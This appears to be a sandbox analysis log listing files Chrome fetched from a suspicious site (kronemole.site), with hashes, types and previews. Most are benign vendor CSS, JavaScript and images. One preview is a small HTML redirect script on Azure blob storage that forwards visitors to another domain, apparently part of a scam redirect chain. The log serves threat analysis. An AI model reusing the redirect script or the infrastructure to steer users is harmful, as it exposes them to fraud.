                                                                          Encrypted:false
                                                                          SSDEEP:3072:GVJ1leUSOWYQc22a5nMBGMQVkvxfNFk89N9oyr3y:GiUHAe+kvxfN64PoyO
                                                                          MD5:728AAC3A5962127B3A2F8F03A60E4F3A
                                                                          SHA1:38FE0D325CB071A06B68472C276C1BE47B5ABBEB
                                                                          SHA-256:5A24AE61B5ED58CDE41279B8017984CD0B29E29C9355C8037DB3F9D13178AEDB
                                                                          SHA-512:1347EBF2D72CB0CA15D4CB5D0DD1E604FAF237889F8A4F5DB0A85165B7DA994F34193792C6CE969732A5E4A67F25EE83192CCD95D6AC3C08E7B2FD51D87E2047
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-M5FVHZX
                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"20",. . "macros":[{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__jsm","vtp_javascript":["template","(function(){return google_tag_manager[\"GTM-M5FVHZX\"].dataLayer.get(\"gtm.element\").parentElement.parentElement.querySelector(\"#questionText\").innerText})();"]},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__jsm","vtp_javascript":["template","(function(){return google_tag_manager[\"GTM-M5FVHZX\"].dataLayer.get(\"gtm.element\").parentElement.querySelector(\"input[name\\x3dp_name]\").value})();"]},{"function":"__u","vtp_component":"QUERY","vtp_queryKey":"s2","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"fu
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 1200 x 427, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):26027
                                                                          Entropy (8bit):7.853513132503639
                                                                          Encrypted:false
                                                                          SSDEEP:768:qMsYtmb2D9WNR37OKqbm06JIXUd9yv5ENZECmC:qZbTNRrnqbGIXUdk5EkpC
                                                                          MD5:20FE0BC0F5FFA8AC0D6A506057BA41E3
                                                                          SHA1:99AEE7DBCB917D4DA8563A7662930C8599CCD663
                                                                          SHA-256:3017F4429EBCD5B01162299C3D744B3B7213DC51274DE7EEA28300ECDB8BF3D6
                                                                          SHA-512:70114D9DA54EC1419129D8CB855E41554B4541DDC277B80151BE0DB330B300E4A6BEEF64F0CF8ABC81F0E5516AC0C54BAB3EF8A14BC963AD70CAB52A566F882C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...............n0....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Windows)" xmp:CreateDate="2023-11-14T20:20:30+05:30" xmp:ModifyDate="2023-11-14T20:23:49+05:30" xmp:MetadataDate="2023-11-14T20:23:49+05:30" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:458d5ccf-2239-0242-b984-c67764c869d2" xmpMM:DocumentID="adobe:docid:photoshop:7958ad5f-b90a-114a-816a-f6c4884161e0"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:dropped
                                                                          Size (bytes):1971
                                                                          Entropy (8bit):7.239167179305185
                                                                          Encrypted:false
                                                                          SSDEEP:48:Il1Nn2WQT5SCwJ3THrQneanX8ilxWobN1rMCQVo3:C255SCeHrQeatlxYCP
                                                                          MD5:0B874CFB0EDFE309414F50C71F523499
                                                                          SHA1:5DA66F89230B65459E607CA0FCB338EBE0C9E2F1
                                                                          SHA-256:2DB4A30686167F451311BBF0791F3B0224C03EE161E82354C760FA5BB0CB4DFC
                                                                          SHA-512:D0D62B306D88ED6BC681F470F9AAFEB65490A275852A289454232099E77DB18032D9048A9FDCDC973D8426A2603F5F32ED4BDA70F627D3F77A4040DAC6774AF0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:0FB6749E8B7F11EDB0BEAE2D10CE7672" xmpMM:DocumentID="xmp.did:0FB6749F8B7F11EDB0BEAE2D10CE7672"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0FB6749C8B7F11EDB0BEAE2D10CE7672" stRef:documentID="xmp.did:0FB6749D8B7F11EDB0BEAE2D10CE7672"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65325)
                                                                          Category:downloaded
                                                                          Size (bytes):144877
                                                                          Entropy (8bit):5.049937202697915
                                                                          Encrypted:false
                                                                          SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
                                                                          MD5:450FC463B8B1A349DF717056FBB3E078
                                                                          SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                                          SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                                          SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/js/vendor/bootstrap/css/bootstrap.min.css
                                                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:dropped
                                                                          Size (bytes):1993
                                                                          Entropy (8bit):7.271100529455783
                                                                          Encrypted:false
                                                                          SSDEEP:48:Il1Nn2WQrj57YJ3rjIcakOkR1WNOVgl9MSONV6I:C2PQ3OkR1WN47/
                                                                          MD5:F3C48D2131FFEB4A35AAA631CB6A5B15
                                                                          SHA1:5B3DE0632C19695B1CEE809604E1B4F93878C2E2
                                                                          SHA-256:612C58D05C6097B07B839936CD1C605A42165861422F23914B30F09AAB06C949
                                                                          SHA-512:BE66FD165821D6960489D9AC9477E94A0CB12139ADA88083D6632F38E34AF223A37316A76C04C57465DD947B14C3DE7EC51EF372839ED943ED7C3BAB9A01D1A9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:1E14ED168B8011EDBF7EC08741E9636F" xmpMM:DocumentID="xmp.did:1E14ED178B8011EDBF7EC08741E9636F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E14ED148B8011EDBF7EC08741E9636F" stRef:documentID="xmp.did:1E14ED158B8011EDBF7EC08741E9636F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):1993
                                                                          Entropy (8bit):7.271100529455783
                                                                          Encrypted:false
                                                                          SSDEEP:48:Il1Nn2WQrj57YJ3rjIcakOkR1WNOVgl9MSONV6I:C2PQ3OkR1WN47/
                                                                          MD5:F3C48D2131FFEB4A35AAA631CB6A5B15
                                                                          SHA1:5B3DE0632C19695B1CEE809604E1B4F93878C2E2
                                                                          SHA-256:612C58D05C6097B07B839936CD1C605A42165861422F23914B30F09AAB06C949
                                                                          SHA-512:BE66FD165821D6960489D9AC9477E94A0CB12139ADA88083D6632F38E34AF223A37316A76C04C57465DD947B14C3DE7EC51EF372839ED943ED7C3BAB9A01D1A9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/fim/3079-US/cbc458c2f5038386fc23f670d1cc7242.jpg
                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:1E14ED168B8011EDBF7EC08741E9636F" xmpMM:DocumentID="xmp.did:1E14ED178B8011EDBF7EC08741E9636F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E14ED148B8011EDBF7EC08741E9636F" stRef:documentID="xmp.did:1E14ED158B8011EDBF7EC08741E9636F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:dropped
                                                                          Size (bytes):2029
                                                                          Entropy (8bit):7.300821281927406
                                                                          Encrypted:false
                                                                          SSDEEP:48:Il1Nn2WQUPHJ3W2NamG77feu+z6qCIXJnQuFs0pM:C2uPU2NN+7feu+z6qCYQuFnq
                                                                          MD5:720FF447E6FEF5D9D89E189EC4650371
                                                                          SHA1:089872548F43807A2BB5F4F0783378C0035D540C
                                                                          SHA-256:249FD954EE073B4596065BCF075F3F469029F16CDBF37B60D611407E8E4469EA
                                                                          SHA-512:5421D65B623182E63D50A8BC709CC1DCBD8B9CA2AEF8AE1AE392FDE900DD5540C4317E96E7856133A8312C43D0FF57704158A6F50297BC965A0955A06C80AB3F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:7882BB928B7F11EDA59CA9172A53E6CF" xmpMM:DocumentID="xmp.did:7882BB938B7F11EDA59CA9172A53E6CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7882BB908B7F11EDA59CA9172A53E6CF" stRef:documentID="xmp.did:7882BB918B7F11EDA59CA9172A53E6CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                          Category:dropped
                                                                          Size (bytes):15406
                                                                          Entropy (8bit):1.4037136087364375
                                                                          Encrypted:false
                                                                          SSDEEP:96:ElxRlQUyXO9WBWibsAdBiED26mTXU5bOql2j:ElxRam8BWi5iED264XU5bOql2j
                                                                          MD5:9E3E8B6D89D426AD950F5144D15921E6
                                                                          SHA1:6CEFE5C7CA4A97D2118FB849F37F4FFA4F9F0EE0
                                                                          SHA-256:703063F5CFEBF76BD6190DD87052D6664D3A0FCF474D837D89F6B7FAE7A8F3B5
                                                                          SHA-512:A063BE8A7879B431338506AEA3975376F7ADDF2B9C01563F4AAEFDAA827C2568F76DA0B32BAE9665E09507C9CEBB44FABE6D194E5944E000FC299FA0A41F1C44
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ............................................................................................................................................................................ ...........Y............................................... ...................Y....................................... ...........................Y............................... ...................................Y...................................................................Z.......................................f...+.......................Y...............9...............g...........).......................Y...............<.......e...................).......................X...........................................*.......................L...........................................*...................t...............................................+...................................................................#...X..................
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):83
                                                                          Entropy (8bit):4.618839209746227
                                                                          Encrypted:false
                                                                          SSDEEP:3:YQ3/eHikG0Xm/IQXsRzHTT7pHMEwWK1:YQ361QiHtH7wd
                                                                          MD5:B7445474E1E6552E05EBECE7B00FDDAA
                                                                          SHA1:8973FF83762CD471C50CE2953AB32C0AA7C4C285
                                                                          SHA-256:4696FC32765A01329555166D8B6EC1903E4007E6F86FF1F252DFE82AC80D0586
                                                                          SHA-512:3F7984B12A72DD0C9C8768DFFE27A908F18ABB47A9ED04CE3862868951CEE80384FCE0BC3B202D6BAEF75AD65701031B7799A42F55F328371262C6940171C956
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://api.taboola.com/2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412
                                                                          Preview:{"user":{"id":"9882c26e-c20f-46a2-8d19-526074df1686-tuctc56675b","isNewUser":true}}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):73625
                                                                          Entropy (8bit):4.7652513405678505
                                                                          Encrypted:false
                                                                          SSDEEP:768:5bUiiiukQWIsjoQCSsncTpsTO3DNnYGmLN0yPburmvcnH+:5giii1IohCSicdsa3DNnYGeZPK4+e
                                                                          MD5:A1E269AEF076BAD8EE205D2A5585D872
                                                                          SHA1:17F5A041BAB663BE0DB80721C404A7A6F3FDAD44
                                                                          SHA-256:462BEB0C8ECB2ABB15685C31875F268D166313581DF110401C2483FAB24A46DF
                                                                          SHA-512:F6259ACFB88C72132440E280F0AE10A73E9BA5045B85E745241F8C49D989E4D7F8A88375FB9C0E567CE0E4142CFE6607DEC2ADCD8F833A0C62C0CCFC66D302B3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/vendors/fontawesome/css/all.css
                                                                          Preview:/*!. * Font Awesome Free 5.15.2 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,..fas,..far,..fal,..fad,..fab {. -moz-osx-font-smoothing: grayscale;. -webkit-font-smoothing: antialiased;. display: inline-block;. font-style: normal;. font-variant: normal;. text-rendering: auto;. line-height: 1; }...fa-lg {. font-size: 1.33333em;. line-height: 0.75em;. vertical-align: -.0667em; }...fa-xs {. font-size: .75em; }...fa-sm {. font-size: .875em; }...fa-1x {. font-size: 1em; }...fa-2x {. font-size: 2em; }...fa-3x {. font-size: 3em; }...fa-4x {. font-size: 4em; }...fa-5x {. font-size: 5em; }...fa-6x {. font-size: 6em; }...fa-7x {. font-size: 7em; }...fa-8x {. font-size: 8em; }...fa-9x {. font-size: 9em; }...fa-10x {. font-size: 10em; }...fa-fw {. text-align: center;. width: 1.25em; }...fa-ul {. list-style-type: none;. margin-left: 2.5em;. padding-left: 0; }. .
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):162
                                                                          Entropy (8bit):4.978919233619267
                                                                          Encrypted:false
                                                                          SSDEEP:3:nmNjJMzVJu+2vXf0dLR9dBkADFoCDRASAL3/Mc/LDoOkADLWECGXRhIb:GMRJAaL7YmmTSQ3/M+D+mfjOb
                                                                          MD5:87B25094695E9D094A9B32CA0C038789
                                                                          SHA1:4A066863FA9FC4811AA2CA5FA042E7C3B8EC2A8E
                                                                          SHA-256:858B138B35F43C2FDB9B3E346E2ABF77B6296EEB1B167244E158CB5714AAC913
                                                                          SHA-512:7402465448CF4F1FE6A9C1E6BD1900893038A47B442F74A2FB11E4E012E8798FD8EEB34394408EB7A425F740DE6D19F1866E17192A3B9E3FD39FE6B2806BBB02
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://adns2.blob.core.windows.net/adns2/21.html
                                                                          Preview:<meta http-equiv="refresh" content="3; url=">..<script>..document.location.href = 'http://leanschoolingclass.wiki/'+window.location.href.split('#')[1];..</script>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48664)
                                                                          Category:downloaded
                                                                          Size (bytes):48944
                                                                          Entropy (8bit):5.272507874206726
                                                                          Encrypted:false
                                                                          SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/js/vendor/bootstrap/js/bootstrap.min.js
                                                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):814
                                                                          Entropy (8bit):4.864352051861333
                                                                          Encrypted:false
                                                                          SSDEEP:12:Ie3npxdHUwyz424QyBimkKMPbwuVGMUsDIgs0xM53U8G8F7X2t+DtbCSALExqL9:IiUwyvdyBimwPb7VGMLDqp7F7X++g4xM
                                                                          MD5:DA5EDE9A3D289E9F7969DF55969432D3
                                                                          SHA1:858DF958B7660AA83D7B9B064FC7A3394009543C
                                                                          SHA-256:91CAEBAA07E970B9566EB195570097C03616D933955113DBFB1ECED337A5F8B5
                                                                          SHA-512:C471D50CE66D612C0A8AD984620CBFDD40EB393E923B10D67F7CA4CC435FB6C82B1DF45183F7F8E1FB7F8BF3842B6B7BCDBF18CC0B216012A2DF04683E4471B8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/js/functions.js?v=3cc6aa721bc3b8a31b45d9388214360e
                                                                          Preview:.function startTimer(duration) {. var timer = duration, minutes, seconds;. setInterval(function() {. minutes = parseInt(timer / 60, 10);. seconds = parseInt(timer % 60, 10);.. minutes = minutes < 10 ? "" + minutes : minutes;. seconds = seconds < 10 ? "0" + seconds : seconds;. if(typeof($('#time')) != "undefined"){. $('#time').html(minutes + ":" + seconds);. }. if (--timer < 0) {. timer = duration;. }. }, 1000);.}.var duration=30*13;.startTimer(duration);...if(refresh_page==1){..var time = new Date().getTime();..$(document.body).bind('mousemove keypress', function(e){...time = new Date().getTime();..});..function refresh(){...if(new Date().getTime() - time >= 30000) ....window.location.reload(true);...else ....setTimeout(refresh, 1000);..}..setTimeout(refresh, 1000);.}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Compressed by jpeg-recompress", progressive, precision 8, 50x50, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):1763
                                                                          Entropy (8bit):7.573734704126781
                                                                          Encrypted:false
                                                                          SSDEEP:48:KYAfMkVVKbK3Z2rTimtPIT3snO57Cb3PoF5luR:BA0kaUZ2X/tQT3snO57Cb3t
                                                                          MD5:A2209D31F7545F9E5E906558780B036C
                                                                          SHA1:36EBA3F889FCBE801B5947067FBF5D9415ED4BC3
                                                                          SHA-256:64F06BC81A732E876CE54FDAE5EA0EB85EF861329306962BD2DAD24FF1CFBC3B
                                                                          SHA-512:A2A6CC5089960802757413563A5249FC2951CACA4CE463789E57D656FF05F87BF987D01D763E7A5AEED29CDD40C57FDD6FF80F8D309F6957E45D578354297BB5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/fim/3079-US/edcfe56a4c763bb53fec401fa03a135a.jpg
                                                                          Preview:......JFIF..............Compressed by jpeg-recompress......................................................"..."*%%*424DD\.................................................."..."*%%*424DD\......2.2.."..................................................|.....B...EX};...M3...W.aeQJ...S.0k.. m.X.R....~n.......................................W.....`49........................................m.}.f.U]_...8.........................."..2!#$BR.1abr.%3AC....Qcq..........?........-..$.....j..E...I.`..x.....J..Hn.....h.....&.3....e.9.N.....]....L7*?M:...-...$..#h.MD.?.jb;AR.....9..,...Ai .@.+F~..b~.|.%0..L.Fu..0.U....1. .L..........}.@@..*] W..`..[..S...PZ.. .q2.+377..4C.+:..e.\NB}g..#..f.9^.I.5.O.\0. ZYC~..k..f..._...;0...e.<U#.nd...Om.v..S.f(H2.V..c.o.j&.,evl..7..q.../t.G.Q5.......R..%.g.t..t.W.h.N M..~XU1.5.MmC...[.!.)..V+M..@A(..]..G..9.V).l...%....csH..T.F...,.,..n..i.^..P.@@.......Nq!L....(4.f...c2J..O2?L..t[.l.x.U.q..Hi...r.%CJ.}!x%.=X..m2.X..]....W....2.H.2VN|.H....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                          Category:downloaded
                                                                          Size (bytes):15406
                                                                          Entropy (8bit):1.4037136087364375
                                                                          Encrypted:false
                                                                          SSDEEP:96:ElxRlQUyXO9WBWibsAdBiED26mTXU5bOql2j:ElxRam8BWi5iED264XU5bOql2j
                                                                          MD5:9E3E8B6D89D426AD950F5144D15921E6
                                                                          SHA1:6CEFE5C7CA4A97D2118FB849F37F4FFA4F9F0EE0
                                                                          SHA-256:703063F5CFEBF76BD6190DD87052D6664D3A0FCF474D837D89F6B7FAE7A8F3B5
                                                                          SHA-512:A063BE8A7879B431338506AEA3975376F7ADDF2B9C01563F4AAEFDAA827C2568F76DA0B32BAE9665E09507C9CEBB44FABE6D194E5944E000FC299FA0A41F1C44
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/fim/3079-US/2ca755302a35b1e76ba6e2a0cc008202.ico
                                                                          Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ............................................................................................................................................................................ ...........Y............................................... ...................Y....................................... ...........................Y............................... ...................................Y...................................................................Z.......................................f...+.......................Y...............9...............g...........).......................Y...............<.......e...................).......................X...........................................*.......................L...........................................*...................t...............................................+...................................................................#...X..................
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):2066
                                                                          Entropy (8bit):7.304025096259172
                                                                          Encrypted:false
                                                                          SSDEEP:24:HK1h3IWwjx82lY2T3yQV6TU8TeyJ3V8TeM6TbGxtyNUOKvtM8kc5Pgy3s7+ZSr1y:Il1Nn2WQox1J3CEbaCU93T5P/s7IFNT
                                                                          MD5:EEE85CC2D8842EC90015748188B39845
                                                                          SHA1:0AF631E58FC1A20430F4383853C2B88E002AD029
                                                                          SHA-256:5665269840FA23FAAC662DBA33673AAB6D0F06FCF1EDCA2FEA09F669CE6BAAAD
                                                                          SHA-512:0372A8BB2D33FBE583030AF650492E17120B3FA9241EF1EC6304C5B24A6149A12026256D23119F56D9857940D9CF936239E8CF7C2D924E303A2BCCB3205E79E1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/fim/3079-US/5ab79569e48f195b913682012875bbbd.jpg
